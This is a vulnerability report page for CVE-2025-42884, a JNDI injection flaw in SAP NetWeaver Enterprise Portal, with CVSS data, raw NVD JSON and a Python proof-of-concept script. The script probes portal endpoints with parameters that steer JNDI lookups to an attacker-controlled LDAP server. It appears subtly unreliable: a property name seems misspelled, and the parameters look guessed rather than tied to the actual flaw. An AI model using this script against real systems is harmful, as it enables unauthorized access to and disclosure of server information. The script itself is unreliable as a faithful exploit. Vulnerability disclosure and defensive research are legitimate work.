Security Vulnerability Report
中文
CVE-2025-42884 CVSS 6.5 MEDIUM

CVE-2025-42884

Published: 2025-11-11 01:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

SAP NetWeaver Enterprise Portal allows an unauthenticated attacker to inject JNDI environment properties or pass a URL used during JNDI lookup operations, enabling access to an unintended JNDI provider.�This could further lead to disclosure or modification of information about the server. There is no impact on availability.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver Enterprise Portal 所有未安装安全补丁的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse def exploit_jndi_injection(target_url, attacker_ldap_url): """ CVE-2025-42884 PoC - SAP NetWeaver JNDI Injection This PoC demonstrates how an attacker can inject JNDI properties to trigger lookup operations to an attacker-controlled LDAP server. Replace 'attacker_ldap_url' with your malicious LDAP server URL. """ # Common endpoint paths for SAP NetWeaver Enterprise Portal paths = [ '/irj/portal', '/webdynpro/dispatcher/sap.com/tc~lm~wd~corefw/', '/UMRuntime/ldap' ] # JNDI injection payload payload = { 'jndi_lookup': attacker_ldap_url, 'java.nmi.provider.url': attacker_ldap_url, 'initial': 'com.sun.jndi.ldap.LdapCtxFactory' } for path in paths: try: url = target_url.rstrip('/') + path print(f"[*] Testing endpoint: {url}") response = requests.get(url, params=payload, timeout=10, verify=False) print(f"[*] Response status: {response.status_code}") if 'exception' in response.text.lower() or 'jndi' in response.text.lower(): print(f"[!] Potential vulnerability detected at {url}") print(f"[*] Response snippet: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-42884 JNDI Injection PoC') parser.add_argument('-t', '--target', required=True, help='Target SAP NetWeaver URL') parser.add_argument('-l', '--ldap', required=True, help='Attacker-controlled LDAP URL') args = parser.parse_args() exploit_jndi_injection(args.target, args.ldap)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42884", "sourceIdentifier": "[email protected]", "published": "2025-11-11T01:15:36.893", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP NetWeaver Enterprise Portal allows an unauthenticated attacker to inject JNDI environment properties or pass a URL used during JNDI lookup operations, enabling access to an unintended JNDI provider.�This could further lead to disclosure or modification of information about the server. There is no impact on availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-943"}]}], "references": [{"url": "https://me.sap.com/notes/3660969", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.